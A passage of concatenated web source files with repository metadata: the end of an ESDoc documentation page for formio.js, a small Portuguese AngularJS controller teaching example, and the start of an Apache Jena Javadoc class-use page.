data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Component">Component</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components--classes-component-editform">components/_classes/component/editForm</a><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-EditFormUtils">EditFormUtils</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components--classes-field">components/_classes/field</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/_classes/field/Field.js~Field.html">Field</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components--classes-nested">components/_classes/nested</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-NestedComponent">NestedComponent</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-address">components/address</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Address">Address</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-button">components/button</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Button">Button</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-checkbox">components/checkbox</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/checkbox/Checkbox.js~CheckBoxComponent.html">CheckBoxComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Checkbox">Checkbox</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-columns">components/columns</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Columns">Columns</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-container">components/container</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/container/Container.js~ContainerComponent.html">ContainerComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Container">Container</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-content">components/content</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Content">Content</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-currency">components/currency</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/currency/Currency.js~CurrencyComponent.html">CurrencyComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Currency">Currency</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-datagrid">components/datagrid</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-DataGrid">DataGrid</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-datamap">components/datamap</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-DataMap">DataMap</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-datetime">components/datetime</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/datetime/DateTime.js~DateTimeComponent.html">DateTimeComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-DateTime">DateTime</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-day">components/day</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Day">Day</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-editgrid">components/editgrid</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-EditGrid">EditGrid</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-email">components/email</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/email/Email.js~EmailComponent.html">EmailComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Email">Email</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-fieldset">components/fieldset</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/fieldset/Fieldset.js~FieldsetComponent.html">FieldsetComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Fieldset">Fieldset</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-file">components/file</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-File">File</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-form">components/form</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Form">Form</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-hidden">components/hidden</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/hidden/Hidden.js~HiddenComponent.html">HiddenComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Hidden">Hidden</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-html">components/html</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/html/HTML.js~HTMLComponent.html">HTMLComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-HTML">HTML</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-number">components/number</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Number">Number</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-panel">components/panel</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Panel">Panel</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-password">components/password</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/password/Password.js~PasswordComponent.html">PasswordComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Password">Password</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-phonenumber">components/phonenumber</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/phonenumber/PhoneNumber.js~PhoneNumberComponent.html">PhoneNumberComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-PhoneNumber">PhoneNumber</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-radio">components/radio</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Radio">Radio</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-recaptcha">components/recaptcha</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/recaptcha/ReCaptcha.js~ReCaptchaComponent.html">ReCaptchaComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-ReCaptcha">ReCaptcha</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-resource">components/resource</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/resource/Resource.js~ResourceComponent.html">ResourceComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Resource">Resource</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-select">components/select</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Select">Select</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-select-fixtures">components/select/fixtures</a><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-multiSelect">multiSelect</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-multiSelectOptions">multiSelectOptions</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-selectboxes">components/selectboxes</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-SelectBoxes">SelectBoxes</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-signature">components/signature</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Signature">Signature</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-survey">components/survey</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Survey">Survey</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-table">components/table</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/table/Table.js~TableComponent.html">TableComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Table">Table</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-tabs">components/tabs</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/tabs/Tabs.js~TabsComponent.html">TabsComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Tabs">Tabs</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-tags">components/tags</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/tags/Tags.js~TagsComponent.html">TagsComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Tags">Tags</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-textarea">components/textarea</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-TextArea">TextArea</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-textfield">components/textfield</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-TextField">TextField</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-time">components/time</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/time/Time.js~TimeComponent.html">TimeComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Time">Time</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-tree">components/tree</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/tree/Node.js~Node.html">Node</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Tree">Tree</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-unknown">components/unknown</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/unknown/Unknown.js~UnknownComponent.html">UnknownComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Unknown">Unknown</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-url">components/url</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/url/Url.js~UrlComponent.html">UrlComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Url">Url</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components-well">components/well</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/well/Well.js~WellComponent.html">WellComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Well">Well</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#contrib">contrib</a><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-Contrib">Contrib</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#contrib-edittable">contrib/edittable</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/contrib/edittable/EditTable.js~EditTableComponent.html">EditTableComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-EditTable">EditTable</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#contrib-location">contrib/location</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/contrib/location/Location.js~LocationComponent.html">LocationComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-Location">Location</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#contrib-modaledit">contrib/modaledit</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/contrib/modaledit/ModalEdit.js~ModalEditComponent.html">ModalEditComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-ModalEdit">ModalEdit</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#contrib-stripe-checkout">contrib/stripe/checkout</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/contrib/stripe/checkout/StripeCheckout.js~StripeCheckoutComponent.html">StripeCheckoutComponent</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#contrib-stripe-stripe">contrib/stripe/stripe</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/contrib/stripe/stripe/Stripe.js~StripeComponent.html">StripeComponent</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#displays">displays</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/displays/Displays.js~Displays.html">Displays</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#providers">providers</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/providers/Providers.js~Providers.html">Providers</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#providers-address">providers/address</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/providers/address/AddressProvider.js~AddressProvider.html">AddressProvider</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/providers/address/AzureAddressProvider.js~AzureAddressProvider.html">AzureAddressProvider</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/providers/address/CustomAddressProvider.js~CustomAddressProvider.html">CustomAddressProvider</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/providers/address/NominatimAddressProvider.js~NominatimAddressProvider.html">NominatimAddressProvider</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#providers-processor">providers/processor</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-fileProcessor">fileProcessor</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#providers-storage">providers/storage</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-azure">azure</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-base64">base64</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-dropbox">dropbox</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-googledrive">googledrive</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-indexeddb">indexeddb</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-s3">s3</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-getFormioUploadAdapterPlugin">getFormioUploadAdapterPlugin</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-url">url</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-setXhrHeaders">setXhrHeaders</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-XHR">XHR</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#templates">templates</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/templates/Templates.js~Templates.html">Templates</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#templates-bootstrap">templates/bootstrap</a><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-iconClass">iconClass</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#utils">utils</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/utils/ChoicesWrapper.js~ChoicesWrapper.html">ChoicesWrapper</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-checkInvalidDate">checkInvalidDate</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-lessOrGreater">lessOrGreater</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-applyFormChanges">applyFormChanges</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-eachComponent">eachComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-escapeRegExCharacters">escapeRegExCharacters</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-findComponent">findComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-findComponents">findComponents</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-flattenComponents">flattenComponents</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-formatAsCurrency">formatAsCurrency</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-generateFormChange">generateFormChange</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-getComponent">getComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-getStrings">getStrings</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-getValue">getValue</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-hasCondition">hasCondition</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-isLayoutComponent">isLayoutComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-matchComponent">matchComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-parseFloatExt">parseFloatExt</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-removeComponent">removeComponent</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-searchComponents">searchComponents</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-KEY_CODES">KEY_CODES</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-Evaluator">Evaluator</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-CALENDAR_ERROR_MESSAGES">CALENDAR_ERROR_MESSAGES</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#utils-jsonlogic">utils/jsonlogic</a><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-lodashOperators">lodashOperators</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#validator">validator</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/validator/Rules.js~Rules.html">Rules</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#validator-conjunctions">validator/conjunctions</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/validator/conjunctions/index.js~Conjunctions.html">Conjunctions</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#validator-operators">validator/operators</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/validator/operators/index.js~Operators.html">Operators</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#validator-quickrules">validator/quickRules</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/validator/quickRules/index.js~QuickRules.html">QuickRules</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#validator-transformers">validator/transformers</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/validator/transformers/index.js~Transformers.html">Transformers</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#validator-valuesources">validator/valueSources</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/validator/valueSources/index.js~ValueSources.html">ValueSources</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#widgets">widgets</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/widgets/InputWidget.js~InputWidget.html">InputWidget</a></span></span></li> </ul> </div> </nav> <div class="content" data-ice="content"><h1 data-ice="title">src/templates/bootstrap/modaldialog/index.js</h1> <pre class="source-code line-number raw-source-code"><code class="prettyprint linenums" data-ice="content">import form from &apos;./form.ejs&apos;; export default { form }; </code></pre> </div> <footer class="footer"> Generated by <a href="https://esdoc.org">ESDoc<span data-ice="esdocVersion">(1.1.0)</span><img src="./image/esdoc-logo-mini-black.png"></a> </footer> <script src="script/search_index.js"></script> <script src="script/search.js"></script> <script src="script/pretty-print.js"></script> <script src="script/inherited-summary.js"></script> <script src="script/test-summary.js"></script> <script src="script/inner-link.js"></script> <script src="script/patch-for-local.js"></script> </body> </html>
formio/formio.js
docs/file/src/templates/bootstrap/modaldialog/index.js.html
HTML
mit
35,797
<!DOCTYPE html> <html ng-app="meuApp"> <head> <title></title> <meta charset="utf-8"> <script src="../bower_components/angular/angular.min.js" type="text/javascript"></script> </head> <body ng-controller="MeuController"> <h1>Exemplo de AngularJS com Controller interno</h1> <div> Variável do controller contém: {{valor}} </div> <div> E seu dobro é: {{valor * 2}} </div> <script> angular.module('meuApp', []) .controller('MeuController', ['$scope', function($scope) { $scope.valor = 35; }]); </script> </body> </html>
lossurdo/ppi2-javascript
www/aula04/exemplo2.html
HTML
mit
540
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_45-internal) on Sat Jul 25 18:14:30 BST 2015 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Uses of Class org.apache.jena.sparql.sse.writers.WriterGraph (Apache Jena ARQ)</title> <meta name="date" content="2015-07-25"> <link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.apache.jena.sparql.sse.writers.WriterGraph (Apache Jena ARQ)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../org/apache/jena/sparql/sse/writers/WriterGraph.html" title="class in org.apache.jena.sparql.sse.writers">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?org/apache/jena/sparql/sse/writers/class-use/WriterGraph.html" target="_top">Frames</a></li> <li><a href="WriterGraph.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.apache.jena.sparql.sse.writers.WriterGraph" class="title">Uses of Class<br>org.apache.jena.sparql.sse.writers.WriterGraph</h2> </div> <div class="classUseContainer">No usage of org.apache.jena.sparql.sse.writers.WriterGraph</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../org/apache/jena/sparql/sse/writers/WriterGraph.html" title="class in org.apache.jena.sparql.sse.writers">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?org/apache/jena/sparql/sse/writers/class-use/WriterGraph.html" 